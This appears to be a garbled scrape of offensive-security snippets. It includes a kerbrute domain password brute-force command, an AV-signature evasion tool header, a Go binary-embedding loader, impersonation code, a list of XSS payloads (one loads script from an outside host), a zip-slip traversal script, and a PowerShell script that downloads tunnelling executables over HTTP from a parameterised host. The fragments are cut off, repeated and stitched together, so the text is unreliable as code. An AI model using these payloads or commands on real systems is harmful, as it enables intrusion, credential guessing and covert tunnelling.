With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With the Rubeus version that includes the brute module:
function Install-WinDbg { | |
param( | |
[switch] $Start | |
) | |
# Change default progress preference (faster downloads) | |
$DefaultProgressPreference = $ProgressPreference | |
$ProgressPreference = 'SilentlyContinue' | |
Write-Host "Downloading windbg.appinstaller (XML manifest file)" |
function Find-AVSignature { | |
<# | |
.SYNOPSIS | |
Find-AVSignature | |
Locates single Byte AV signatures utilizing the same method as DSplit from "class101" on heapoverflow.com | |
Authors: Chris Campbell (@obscuresec) & Matt Graeber (@mattifestation) | |
License: BSD 3-Clause |
package main | |
/* | |
Example Go program with multiple .NET Binaries embedded | |
This requires packr (https://github.com/gobuffalo/packr) and the packr utility. Install with: | |
$ go get -u github.com/gobuffalo/packr/packr | |
Place all your EXEs in a "binaries" folder |
using NtApiDotNet; | |
using System; | |
using System.Collections.Generic; | |
using System.Diagnostics; | |
using System.IO; | |
using System.Linq; | |
using System.Text; | |
using System.Threading; | |
using System.Threading.Tasks; |
// A demonstration example for http://stackoverflow.com/a/26124494 | |
// It runs a goroutine locked to an OS thread on Windows | |
// then impersonates that thread as another user using its name | |
// and plaintext password, then reverts to the default security | |
// context before detaching from its OS thread. | |
package main | |
import ( | |
"log" | |
"runtime" |
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
'';!--"<XSS>=&{()} | |
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
<script/src=data:,alert()> | |
<marquee/onstart=alert()> | |
<video/poster/onerror=alert()> | |
<isindex/autofocus/onfocus=alert()> | |
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
<IMG SRC="javascript:alert('XSS');"> | |
<IMG SRC=javascript:alert('XSS')> |
#!/usr/bin/env python | |
import zipfile | |
import sys | |
import os | |
''' | |
Usage: | |
python zipslip.py xct.zip root.txt ../../../../.. | |
Added ../../../../../root.txt to xct.zip | |
''' |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With the Rubeus version that includes the brute module:
# Fetches a fixed list of files from http://<addr>:<port>/ into the current
# directory and a certs/ subdirectory.
#
# Parameters:
#   $addr - host name or address of the HTTP server the files are pulled from
#   $port - TCP port of that server
#
# NOTE(review): every request below is plain HTTP and nothing verifies a hash or
# signature afterwards, so the executables and certificate material are accepted
# exactly as delivered by whatever answers on that address and port.
# NOTE(review): $addr and $port are interpolated into the URL without validation.
param([string]$addr, [string]$port)
# In Windows PowerShell `wget` is an alias of Invoke-WebRequest; `-o` is
# presumably resolved as -OutFile there. A native wget binary treats -o as a
# log-file option instead, so behaviour depends on the host — confirm.
# NOTE(review): ssf.exe / ssfd.exe look like a client/daemon pair of a tunnelling
# tool (judged from the names only — confirm). For detection, the visible pattern
# is PowerShell writing .exe files fetched over HTTP from a parameterised host:port.
wget "http://${addr}:${port}/ssf.exe" -o "ssf.exe"
wget "http://${addr}:${port}/ssfd.exe" -o "ssfd.exe"
# Certificate material is placed in certs/; no matching `cd ..` is visible, so the
# working directory stays inside certs/ after these lines.
mkdir certs
cd certs
wget "http://${addr}:${port}/certs/certificate.crt" -o "certificate.crt"
# dh4096.pem is, by its name, a Diffie-Hellman parameter file — not verified here.
wget "http://${addr}:${port}/certs/dh4096.pem" -o "dh4096.pem"